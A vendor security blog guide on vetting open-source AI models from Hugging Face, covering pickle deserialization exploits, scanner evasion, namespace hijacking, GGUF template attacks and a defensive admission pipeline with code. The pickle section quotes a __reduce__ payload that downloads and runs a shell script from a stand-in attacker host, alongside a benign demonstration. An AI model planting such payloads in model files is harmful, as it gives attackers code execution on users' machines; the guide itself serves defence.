
Open Source AI Model Security: Vetting Hugging Face Downloads

BeyondScale Team

AI Security Team

Open source AI model security is where most enterprise AI deployments have the largest unaddressed gap. Organizations download models from Hugging Face, Ollama, and similar public hubs at scale, often without any formal admission process beyond "it worked in the notebook." This guide covers the specific attack surfaces that make open source model downloads dangerous, the tooling available today for enterprise vetting, and a practical model admission pipeline that security and ML teams can implement together.

Key Takeaways

    • 28,000+ models on Hugging Face are currently marked suspicious; 100+ confirmed malicious models were found in a single JFrog research sweep.
    • 95% of confirmed malicious ML models target PyTorch's pickle serialization format. A model file can execute arbitrary OS commands the moment it is loaded.
    • Hugging Face flags unsafe models but does not block downloads. JFrog and Sonatype have together documented seven confirmed bypass vulnerabilities in PickleScan.
    • Namespace hijacking lets attackers inherit abandoned model paths and insert poisoned models into existing dependency chains. Unit 42 demonstrated this successfully against Google Vertex AI and Microsoft Azure AI Foundry.
    • GGUF models carry a distinct risk: malicious Jinja2 instructions embedded in chat templates execute at inference time, not at load time, bypassing all static file scanners.
    • SafeTensors eliminates pickle-based RCE entirely. Requiring SafeTensors format for all production model ingestion is the single highest-impact policy change an enterprise can make.
    • A model admission pipeline combining format policy, static scanning, behavioral analysis, and provenance verification reduces the attack surface to a manageable scope.

Why Open Source Model Trust Is Broken

Hugging Face hosts over 2.2 million models with roughly 15 million downloads per day. This scale has made it the default distribution channel for ML teams, but it was built for accessibility, not security. The platform's trust signals, a green "safe" badge and a download count, do not correspond to any meaningful security guarantee.

Consider the data. In a three-month continuous detection study, researchers found 91 malicious models and 9 malicious dataset loading scripts across the platform. Of those 91 models, 76 used pickle deserialization exploits and 15 used Keras custom Lambda layer abuse. JFrog found over 100 malicious models in a single research sweep, with payloads including silent backdoors granting full shell access to compromised machines.

The adoption gap compounds the problem. According to HiddenLayer's 2026 AI Threat Landscape Report, only 49% of organizations scan models for safety before deployment, while 97% use models from public repositories. That gap between near-universal consumption and sub-50% scanning is where attackers operate.

Pickle Exploits: The Root Cause

PyTorch .pt, .pth, and .bin files are ZIP archives containing a data.pkl file. Pickle is Python's general-purpose object serialization format, designed for convenience rather than security. When an object is pickled, its __reduce__ or __reduce_ex__ method specifies a callable and its arguments, and the unpickler invokes that callable during deserialization. An attacker overrides __reduce__ to return (os.system, ("wget attacker.com/shell.sh -O /tmp/s && bash /tmp/s",)) or equivalent. That code runs at torch.load() time, before the model weights are ever examined.
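The pattern is compact enough to illustrate directly. The sketch below is a harmless stand-in for the attack described above: the callable returned by __reduce__ runs the moment the bytes are unpickled, with an echo command in place of an attacker's download-and-execute payload.

    import os
    import pickle


    class MaliciousPayload:
        """Illustration only: the callable returned here runs during unpickling."""

        def __reduce__(self):
            # At unpickling time, pickle invokes os.system with this argument.
            # A real payload would fetch and execute a remote script instead.
            return (os.system, ("echo pwned: code ran during deserialization",))


    blob = pickle.dumps(MaliciousPayload())

    # The command runs here, before any "model weights" are ever examined.
    pickle.loads(blob)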

The attack requires no vulnerability in PyTorch itself. It is the intended behavior of the pickle protocol, applied to a hostile input. The model file looks legitimate. The download completes normally. The infection runs silently.

The JFrog silent backdoor campaign demonstrated exactly this against data scientists using Hugging Face. Models were crafted with __reduce__ payloads that granted persistent shell access. Victims only needed to load the model. HiddenLayer's research separately demonstrated packaging ransomware inside a model file using the same mechanism.

CVE-2026-25874, disclosed in April 2026, extended this to Hugging Face's own robotics framework LeRobot. Unsafe deserialization via pickle.loads() over gRPC channels with neither TLS nor authentication allowed a remote attacker to send a malicious serialized payload to the PolicyServer network port and execute arbitrary OS commands on GPU-backed inference servers, which commonly run with elevated privileges.

CVE-2025-1550 showed that Keras is not safe by default either. The vulnerability allowed arbitrary code execution even with safe_mode=True enabled: an attacker modifying config.json inside a .keras archive could specify arbitrary Python modules and functions to execute at model load time. Protect AI Guardian detected this on Hugging Face before public disclosure.

Scanner Evasion Is Documented and Widespread

The NullifAI campaign, analyzed by ReversingLabs in February 2025, demonstrated a technique that bypassed Hugging Face's own scanner. The malicious models used 7z compression instead of ZIP for the archive container, which caused torch.load() and PickleScan to error out on the outer wrapper without reading the payload. The malicious reverse-shell instructions were placed at the beginning of the pickle stream, so any loader that did deserialize the stream executed them before reaching the broken portion, while PickleScan reported nothing. The models phoned home to a hardcoded IP and established persistent shells. Hugging Face removed them within 24 hours of disclosure, after they had already accumulated downloads.

JFrog and Sonatype have documented seven confirmed bypass vulnerabilities in PickleScan between them, including broken pickle stream evasion, archive format manipulation, and obfuscated opcode techniques. PickleScan is the scanner Hugging Face uses natively. An enterprise relying on the Hugging Face "safe" badge as a security control is relying on a scanner with known, documented bypasses.

Namespace Hijacking and the Deleted-Author Problem

Pickle exploits target the model file itself. Namespace hijacking targets the distribution channel.

When a Hugging Face account is deleted or abandoned, the username namespace is freed. An attacker can re-register it. Any repository that previously existed under that namespace, and any dependency pinned to huggingface.co/[old-username]/[model-repo] in a requirements file, CI configuration, or model registry, now resolves to the attacker's account.

Palo Alto Unit 42 demonstrated this as "model namespace reuse," successfully achieving reverse shell injection against orphaned models in Google Vertex AI Model Garden and Microsoft Azure AI Foundry Model Catalog. Legit Security named the Hugging Face variant "AI Jacking" and estimated tens of thousands of developers were potentially affected.

In practice, this means a model that passed a security review and was written into a CI pipeline can silently become malicious months later if the original author deletes their account. Version pinning to a specific commit hash, rather than a floating model version, mitigates this for static dependencies. But most organizations do not pin at that level, and model hubs do not enforce commit-level immutability the way package managers do.
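A minimal sketch of commit-level pinning using the transformers revision parameter is below; the repository ID and commit SHA are placeholders, not real artifacts.

    from transformers import AutoModelForCausalLM, AutoTokenizer

    # Hypothetical repository and commit SHA: pin to an immutable commit rather
    # than a floating branch like "main", so a re-registered namespace cannot
    # silently swap out the content an existing pipeline resolves to.
    REPO_ID = "example-org/example-model"
    PINNED_COMMIT = "0123456789abcdef0123456789abcdef01234567"

    tokenizer = AutoTokenizer.from_pretrained(REPO_ID, revision=PINNED_COMMIT)
    model = AutoModelForCausalLM.from_pretrained(REPO_ID, revision=PINNED_COMMIT)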

GGUF Models: Inference-Time Attacks Beyond Static Scanning

GGUF is the dominant format for running quantized LLMs locally with tools like llama.cpp, Ollama, and LM Studio. As of January 2026, over 156,000 GGUF model files exist on Hugging Face across 2,500+ accounts.

GGUF files support a chat template field in their metadata, a Jinja2 template that formats prompts before they are sent to the model. Researchers at Splunk and Pillar Security demonstrated that attackers can embed malicious Jinja2 instructions directly in this template. The payload does not execute at load time. It executes at inference time, against every prompt processed by the model. This means a model can pass every static file scanner currently available and still carry an active payload that executes in production.

Static scanning tools that inspect file bytes cannot detect this class of attack without understanding the semantics of the template. Runtime monitoring, behavioral analysis during inference, and template inspection are required controls that no current open-source scanner provides.

Building an Enterprise Model Admission Pipeline

A model admission pipeline treats downloaded models the same way a network security team treats inbound traffic: inspect, classify, and enforce policy before allowing access to production systems. The following stages address the threat classes above.

Stage 1: Format policy enforcement

Require SafeTensors format for all production model ingestion as a default policy. SafeTensors stores only raw tensor data and metadata. There are no Python objects, no __reduce__ methods, and no code execution possible at load time. The format has been formally audited by EleutherAI and joined the PyTorch Foundation as an official project in 2025. As of early 2026, 42% of Hugging Face models are already tagged as SafeTensors, including most major open-weight models (Llama 3, Mistral, Gemma, Qwen, DeepSeek). Models available only in pickle-based formats should be quarantined and manually reviewed before production admission.
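A minimal sketch of what this policy looks like at the loading boundary, assuming the safetensors package; the helper name and allowed-suffix set are illustrative, not a standard API.

    from pathlib import Path

    from safetensors.torch import load_file

    ALLOWED_SUFFIXES = {".safetensors"}


    def load_weights(path: str) -> dict:
        p = Path(path)
        if p.suffix not in ALLOWED_SUFFIXES:
            raise ValueError(f"Refusing to load {p.name}: only SafeTensors is admitted")
        # load_file parses raw tensors and JSON metadata only; there is no
        # pickle stream and no code path that executes attacker-controlled code.
        return load_file(str(p))


    # state_dict = load_weights("model.safetensors")
    # model.load_state_dict(state_dict)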

Stage 2: Static file scanning

Run models through a multi-format scanner before they enter any shared environment. Protect AI's open-source ModelScan covers PyTorch, TensorFlow, Keras, ONNX, and GGUF formats and integrates into CI/CD pipelines. For enterprise enforcement with audit trails, Protect AI Guardian or HiddenLayer's Model Scanner add coverage for 35+ formats, behavioral backdoor detection, AI Bill of Materials (AIBOM) generation, and integrations with Databricks Unity Catalog, SageMaker, and Azure AI Foundry. Cisco Foundation AI runs continuous scanning of all public Hugging Face files using a custom-fit ClamAV engine. Use at least two scanners in sequence: the documented bypass techniques that evade PickleScan may not evade Guardian or HiddenLayer's scanner. Defense in depth applies to scanning as much as it does to network security.
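A rough sketch of sequential scanning in a CI step, assuming Protect AI's modelscan CLI and its -p path flag; the second command and the quarantine path are placeholders for whichever additional engine and layout your pipeline uses.

    import subprocess
    import sys

    MODEL_DIR = "./quarantine/incoming-model"  # hypothetical quarantine path

    # First pass: Protect AI's open-source ModelScan (pip install modelscan).
    first = subprocess.run(["modelscan", "-p", MODEL_DIR])

    # Second pass: a different engine, so a bypass against one scanner does not
    # clear the model on its own. Replace with your commercial or internal tool.
    second = subprocess.run(["second-scanner", "--path", MODEL_DIR])

    # Block admission if either scanner reports findings (non-zero exit code).
    if first.returncode != 0 or second.returncode != 0:
        sys.exit("Static scanning failed: blocking model admission")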

Stage 3: Provenance and namespace verification

Before downloading any model, verify that the publishing account is active, the repository is associated with a known organization (not a personal account), and the model's commit history is consistent with legitimate development. Flag any model where the namespace was registered less than 30 days ago. For models pulled from internal registries, enforce commit-hash pinning rather than floating version references. The Unit 42 namespace reuse attack vector is only exploitable if you allow floating namespace resolution.
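A sketch of that check using the huggingface_hub client; the repository ID is a placeholder, and created_at (the repository creation date, available in recent huggingface_hub releases) is used here only as a rough proxy for a freshly registered namespace.

    from datetime import datetime, timedelta, timezone

    from huggingface_hub import HfApi

    REPO_ID = "example-org/example-model"  # hypothetical repository

    info = HfApi().model_info(REPO_ID)

    # Record the exact commit to pin in CI configs and the internal registry.
    pinned_commit = info.sha

    # Flag repositories created within the last 30 days for elevated review.
    if info.created_at and info.created_at > datetime.now(timezone.utc) - timedelta(days=30):
        raise RuntimeError(f"{REPO_ID} was created recently; elevated review required")

    print(f"Approved for download at commit {pinned_commit}")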

Stage 4: Quarantine and behavioral analysis

Run new models in an air-gapped inference environment before admitting them to any shared GPU cluster or inference server. Monitor for outbound network connections, filesystem writes outside expected paths, unexpected subprocess spawning, and memory access patterns inconsistent with inference workloads. This stage is the primary defense against evasion techniques that bypass static scanners: the model may pass file inspection but reveal its payload under controlled execution. The NullifAI campaign payload phoned home to a hardcoded IP during model loading, which network egress monitoring would have detected immediately.
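A minimal sketch of the egress check, assuming psutil and a hypothetical load_model.py script that does nothing but deserialize the quarantined model: a call-home during loading, like the NullifAI payload's, shows up as an outbound connection from the child process. A production setup would rely on a properly isolated sandbox and network-level egress controls rather than a host-side poll.

    import subprocess
    import time

    import psutil

    # load_model.py is a hypothetical script that only deserializes the model.
    proc = subprocess.Popen(["python", "load_model.py", "./quarantine/incoming-model"])
    child = psutil.Process(proc.pid)

    suspicious = set()
    while proc.poll() is None:
        # A plain weights load should never open sockets to remote hosts.
        # (Older psutil releases call this method connections().)
        for conn in child.net_connections(kind="inet"):
            if conn.raddr:
                suspicious.add(conn.raddr)
        time.sleep(0.5)

    if suspicious:
        print(f"Outbound connections during load: {suspicious}; rejecting model")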

Stage 5: GGUF template inspection

For GGUF models specifically, extract and audit the chat template before deployment. Render the template against a set of test prompts in a sandboxed environment and inspect outputs for unexpected content, system command patterns, or exfiltration attempts. Automated template analysis is an emerging capability: Pillar Security's research provides the technical basis, and manual review by a security engineer familiar with Jinja2 is sufficient for low-volume intake.
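A sketch of that review step, assuming the chat template string has already been pulled out of the GGUF metadata (the tokenizer.chat_template key, for example via the gguf reader package): the template source is checked for suspicious patterns and rendered against a benign test conversation inside Jinja2's sandboxed environment.

    from jinja2.sandbox import ImmutableSandboxedEnvironment

    # Assumed to be extracted beforehand from the GGUF metadata key
    # "tokenizer.chat_template".
    chat_template = open("extracted_chat_template.jinja").read()

    # Source-level review: dunder access, module references, or URLs inside a
    # prompt-formatting template deserve manual inspection.
    SUSPICIOUS_MARKERS = ["__", "import", "subprocess", "http://", "https://"]
    hits = [m for m in SUSPICIOUS_MARKERS if m in chat_template]

    # Render a benign test conversation in Jinja2's sandbox, which blocks
    # attribute access that reaches into Python internals.
    env = ImmutableSandboxedEnvironment()
    rendered = env.from_string(chat_template).render(
        messages=[{"role": "user", "content": "test prompt"}],
        add_generation_prompt=True,
        bos_token="<s>",
        eos_token="</s>",
    )

    print("Suspicious markers found:", hits)
    print("Rendered output for manual review:")
    print(rendered)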

Stage 6: Model signing and registry policy

Maintain an internal model registry that records the source URL, download hash, scan results, review status, and approving engineer for every model in use. Only models in the registry are permitted to run in production environments. Integrate registry checks into your ML platform's model loading path so that engineers attempting to load an unregistered model get a policy block, not a silent download. This is the enforcement layer that turns all of the above controls from advisory to mandatory.
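A minimal sketch of that enforcement hook, with a hypothetical JSON export of the registry keyed by file hash; the real integration point is whatever model-loading path your ML platform exposes.

    import hashlib
    import json
    from pathlib import Path

    REGISTRY_PATH = Path("model_registry.json")  # hypothetical registry export


    def sha256_of(path: Path) -> str:
        digest = hashlib.sha256()
        with path.open("rb") as f:
            for chunk in iter(lambda: f.read(1 << 20), b""):
                digest.update(chunk)
        return digest.hexdigest()


    def enforce_registry(model_path: str) -> None:
        """Block any artifact whose hash is not recorded and approved."""
        registry = json.loads(REGISTRY_PATH.read_text())
        entry = registry.get(sha256_of(Path(model_path)))
        if entry is None or entry.get("status") != "approved":
            raise PermissionError(f"{model_path} is not an approved model; load blocked")


    # Called before any deserialization in the platform's model-loading path.
    enforce_registry("./models/approved-model.safetensors")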

Policy Template: AI Model Acceptable Use for Open Source

The following policy elements, adapted from NIST AI RMF 1.0 and OWASP LLM03:2025 guidance, provide a compliance-aligned foundation for enterprise model governance.

All production AI models must be acquired only from sources approved by the security team. Approved sources are recorded in the model registry and reviewed quarterly.

SafeTensors format is required for all models in production inference environments. Models available only in pickle-based formats require explicit security review and written approval before production admission.

Every model must pass static scanning by at least two approved scanners before entering the internal model registry. Scan reports are retained for 24 months.

Models must be run in an isolated behavioral analysis environment for a minimum of 48 hours before production admission. Network egress during this period is blocked and logged.

Namespace verification is required before download. Any model from a namespace registered in the last 30 days requires elevated review.

GGUF models require chat template inspection before deployment. Templates must be reviewed by a security engineer and the review result recorded in the model registry.

BeyondScale's existing resources on AI model supply chain security and AI security assessments provide additional context for teams building out these controls.

Compliance Framework Mapping

OWASP LLM03:2025 (Supply Chain) directly addresses third-party pre-trained models on public platforms as attack vectors and recommends provenance verification and model signing. LLM04:2025 (Data and Model Poisoning) covers manipulation of pre-training and fine-tuning data, with PoisonGPT cited as a real example of direct parameter manipulation bypassing safety features.

NIST AI RMF 1.0 and the Generative AI Profile (NIST-AI-600-1) provide the governance framework. The Govern, Map, Measure, and Manage functions address supply chain risks explicitly, including compromised models, datasets, and third-party APIs.

For regulated industries, the EU AI Act's requirements for high-risk AI systems include documentation of training data provenance and model integrity controls. A model admission pipeline with AIBOM generation per scan provides the artifact trail these requirements demand.

Conclusion

Open source AI model security is not a theoretical concern. JFrog, ReversingLabs, Palo Alto Unit 42, and academic researchers have all demonstrated live attacks against production-like environments using models pulled from Hugging Face. The tooling to defend against these attacks exists today: SafeTensors format policy, multi-scanner CI/CD integration, behavioral quarantine, and provenance verification together close the most critical attack surfaces.

The gap is not in available tools. It is in the absence of a formal admission process. Most ML teams treat model downloads the same way developers treated open source npm packages before the Log4Shell era: pull and run, trust the badge. The analogy is appropriate. The response is the same: formalize the intake process before the incident.

If your organization is deploying open source models in production and does not have a model admission pipeline in place, an AI security assessment is the fastest way to establish your current exposure and build the policy and tooling foundations your ML platform needs.

For teams building out controls now, the OWASP LLM Top 10 supply chain guidance and NIST AI RMF generative AI profile are the two most actionable external references. Both are linked above.
